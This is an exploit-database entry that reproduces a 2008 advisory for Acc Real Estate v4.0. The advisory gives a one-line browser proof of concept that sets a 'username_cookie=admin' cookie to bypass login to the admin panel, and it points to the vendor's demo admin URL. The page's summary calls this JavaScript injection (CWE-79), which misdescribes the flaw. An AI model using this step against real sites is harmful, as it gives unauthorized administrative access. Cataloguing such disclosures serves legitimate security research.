header-logo
Suggest Exploit
vendor:
Acc Real Estate
by:
Hakxer
7.5
CVSS
HIGH
Insecure Cookie Handling
79
CWE
Product Name: Acc Real Estate
Affected Version From: 4
Affected Version To: 4
Patch Exists: NO
Related CWE: N/A
CPE: accscripts.com/realestate
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Acc Real Estate v4.0 Insecure Cookie Handling

A vulnerability exists in Acc Real Estate v4.0 which allows an attacker to inject malicious JavaScript code into the username_cookie parameter of the /admin/Index.php page. This can be exploited to gain administrative access to the application.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in the application.
Source

Exploit-DB raw data:

###########################################################################
      ______    __  __   ______          __                ______                   
     / ____/___ \ \/ /  / ____/___  ____/ /__  __________ /_  __/__  ____ _____ ___ 
    / __/ / __ `/\  /  / /   / __ \/ __  / _ \/ ___/ ___/  / / / _ \/ __ `/ __ `__ \
   / /___/ /_/ / / /  / /___/ /_/ / /_/ /  __/ /  (__  )  / / /  __/ /_/ / / / / / /
  /_____/\__, / /_/   \____/\____/\__,_/\___/_/  /____/  /_/  \___/\__,_/_/ /_/ /_/ 
        /____/                                           

# [~] Discovered by : Hakxer
# [~] Type Gap : Acc Real Estate v4.0 Insecure Cookie Handling
# [~] Script : http://www.accscripts.com/realestate/admin-area-specifications.html
# [~] Greetz : Allah .. " Allah AkBar .. " Big Hacking SoOoN
##########################################################################

Bug In : /admin/Index.php
   
   PoC : javascript:document.cookie="username_cookie=admin";
   
   [~] Admin panel 
   http://www.accscripts.com/realestate/demo/admin/index.php
   [~] Execute JS Code javascript:document.cookie="username_cookie=admin"; 
   [~] Refresh
		

#  Proud To be a Muslim #
#_=END=_#

# milw0rm.com [2008-11-03]

Navigation

Suggest Exploit

Services By CQR